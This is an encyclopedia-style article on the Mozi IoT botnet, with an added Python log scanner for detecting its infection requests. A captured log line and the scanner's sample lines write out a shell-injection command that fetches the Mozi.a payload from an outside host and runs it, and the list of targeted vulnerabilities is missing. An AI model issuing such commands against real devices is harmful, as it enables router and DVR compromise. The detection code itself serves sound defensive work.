Mozi botnet
The Mozi botnet is a botnet targeting IoT devices. In September 2019, 71% of the botnet was located in China. In March, that share jumped to 81%.[1] The botnet was first discovered near the end of 2019 and is currently active. Similar to the Mirai botnet, it targets consumer routers via security vulnerabilities and shell injections.[2] It uses peer-to-peer technology to spread infectious code to new hosts.[3]
Behavior
While the botnet can target IoT devices via weak telnet passwords, it can also exploit devices over HTTP.[4]
115.51.xx.xx - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.51.xx.xx:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"
In the request above, an infected host attempts to make the requested server download and execute the "Mozi.a" file. The Mozi.a file is served from the infected host itself, on a random port. Targeted hosts include routers and DVRs.
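A defender can look for this request shape in web server logs. The following is an added example, not part of the original article: it parses Combined Log Format lines, decodes the request target, and flags download-and-run command chains. The function names, regexes and sample lines (using RFC 5737 documentation addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format prefix: client, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# A fetch tool followed by a URL, anywhere in the decoded request target
FETCH_RE = re.compile(r'\b(?:wget|curl|tftp)\s+(?P<url>https?://[^\s;|&]+)')
# Shell chaining plus making a file executable: the download-and-run shape
CHAIN_RE = re.compile(r'[;|&`]')
EXEC_RE = re.compile(r'\bchmod\s+\+?[0-7x]+\s+\S+')

# Constructed sample lines modelled on the request shown in the article
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://203.0.113.7:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"',
    '198.51.100.20 - - [13/Nov/2020:15:55:02 -0500] "GET /index.html?q=wget+manual HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Nov/2020:15:56:40 -0500] "GET /shell?cd%20/tmp;wget%20http://203.0.113.7:36669/Mozi.a;chmod%20777%20Mozi.a HTTP/1.1" 404 4214 "-" "Hello, world"',
]

def inspect_line(line):
    """Return a finding dict if the request carries a download-and-run chain."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["target"])  # '+' and %xx encode the spaces
    fetch = FETCH_RE.search(decoded)
    if not (fetch and CHAIN_RE.search(decoded) and EXEC_RE.search(decoded)):
        return None
    url = urlsplit(fetch["url"])
    return {
        "client": m["client"],
        "status": int(m["status"]),
        "payload_url": fetch["url"],
        "payload_name": url.path.rsplit("/", 1)[-1],
        # True when the requester also hosts the payload (peer-to-peer spread)
        "self_hosted": url.hostname == m["client"],
    }

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The status field helps triage: the 404 in the article's sample line shows that the server had no /shell endpoint to receive the command.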
The botnet targets the following vulnerabilities:
The malware inserted onto the server is designed to interact with other peers to exchange information. The malware can be executed on ARM or MIPS processors. Once a host is infected, it can carry out DDoS attacks, payload execution, and additional distribution of the malware.
References
1. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
2. "A New Botnet Attack Just Mozied Into Town". Security Intelligence. Retrieved 2021-03-28.
3. "Mozi Botnet Accounts for Most Traffic in Q1 2020, New Research Shows". Bitdefender Box. Retrieved 2021-03-28.
4. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
Mozi Botnet Article Submission
This article "Mozi botnet" is from Wikipedia. The list of its authors can be seen in its historical and/or the page Edithistory:Mozi botnet. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.